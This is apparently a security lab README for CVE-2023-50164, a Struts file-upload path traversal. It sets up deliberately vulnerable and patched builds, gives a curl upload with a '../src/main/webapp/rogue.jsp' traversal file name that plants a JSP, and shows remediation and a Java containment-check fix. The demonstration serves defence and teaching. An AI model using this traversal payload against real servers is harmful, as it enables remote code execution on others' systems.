This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), a path traversal vulnerability in the file upload handling of [struts-core](https://struts.apache.org/) that can lead to Remote Code Execution (RCE).

To remediate the issue, update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of [Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC
There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.
To run _with the RCE vuln_, execute the following:
```
mvn clean jetty:run -P vuln
```
To run _without the RCE vuln_, execute the following:
```
mvn clean jetty:run -P no-vuln
```
The difference between the two profiles is that `vuln` uses `struts-core` version `6.3.0.1`
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2`
(which does not have the path traversal vulnerability).

## Exploit the Vuln
While running the `vuln` profile described above, execute the following:
```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll then find the file `rogue.jsp` in the `src/main/webapp` folder, and you can browse to it at
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is also a code-level fix that works with the older Struts versions, _but_ it is still highly advised to update
your version of Struts.

To exercise the code fix, execute the following:
```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll see an error message: `Attempted path traversal attack`

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln`
endpoint, even if you use a relative path like `../src/main/webapp/rogue.jsp`, as the new version of Struts
automatically strips away relative path references.
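The code-level fix above rejects a client-supplied file name that would leave the intended upload directory. The following is an added example of that kind of check, not the repo's `UploadNoVuln.java`: it assumes an `uploads` directory and that the action's `execute()` would call `store()` with the interceptor's temp file (`Upload`) and the `uploadFileName` value, normalizing the name and refusing anything that resolves outside the directory before the file is written.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;

// Added example, not the repo's UploadNoVuln.java: validates the client-supplied
// file name before the uploaded temp file is moved into the uploads directory.
public class SafeUploadStore {
    private final Path uploadsDir;
    public SafeUploadStore(Path uploadsDir) throws IOException {
        // Canonicalize once so symlinks in the base path are resolved up front.
        this.uploadsDir = uploadsDir.toRealPath();
    }

    // Returns the resolved destination, or throws if the name would escape uploadsDir.
    public Path resolveDestination(String clientFileName) {
        if (clientFileName == null || clientFileName.isBlank()) {
            throw new IllegalArgumentException("Missing file name");
        }
        // A file name must be a single path element: no separators, no NUL byte.
        if (clientFileName.contains("/") || clientFileName.contains("\\") || clientFileName.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        Path target = uploadsDir.resolve(clientFileName).normalize();
        // Containment check: after normalization the target must still sit inside uploadsDir.
        if (!target.startsWith(uploadsDir) || target.equals(uploadsDir)) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        return target;
    }

    // Copies the interceptor's temp file to the validated destination.
    public Path store(Path tempUpload, String clientFileName) throws IOException {
        return Files.copy(tempUpload, resolveDestination(clientFileName),
                StandardCopyOption.REPLACE_EXISTING);
    }

    public static void main(String[] args) throws IOException {
        SafeUploadStore store = new SafeUploadStore(Files.createTempDirectory("uploads"));
        // Constructed sample names: only the first one is accepted.
        String[] names = {"report.pdf", "../src/main/webapp/rogue.jsp", "..", "a/../../x.jsp"};
        for (String name : names) {
            try {
                System.out.println("accepted: " + store.resolveDestination(name));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected '" + name + "': " + e.getMessage());
            }
        }
    }
}
```

Because this PoC relies on the server executing the uploaded `rogue.jsp`, an extension allow-list that refuses server-executable types is a worthwhile second layer on top of the containment check.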
## Repository layout

```
├── [ 11K]  LICENSE
├── [ 10K]  mvnw
├── [6.8K]  mvnw.cmd
├── [4.0K]  payload
│   └── [ 173]  rogue.jsp
├── [4.0K]  pom.xml
├── [2.1K]  README.md
├── [4.0K]  src
│   └── [4.0K]  main
│       ├── [4.0K]  java
│       │   └── [4.0K]  io
│       │       └── [4.0K]  snyk
│       │           └── [4.0K]  labs
│       │               └── [4.0K]  actions
│       │                   ├── [1.8K]  Upload.java
│       │                   └── [2.5K]  UploadNoVuln.java
│       ├── [4.0K]  resources
│       │   └── [1.2K]  struts.xml
│       └── [4.0K]  webapp
│           ├── [ 190]  index.html
│           └── [4.0K]  WEB-INF
│               ├── [ 579]  error.jsp
│               ├── [ 600]  success.jsp
│               ├── [ 570]  upload.jsp
│               └── [ 780]  web.xml
└── [4.0K]  uploads

12 directories, 14 files
```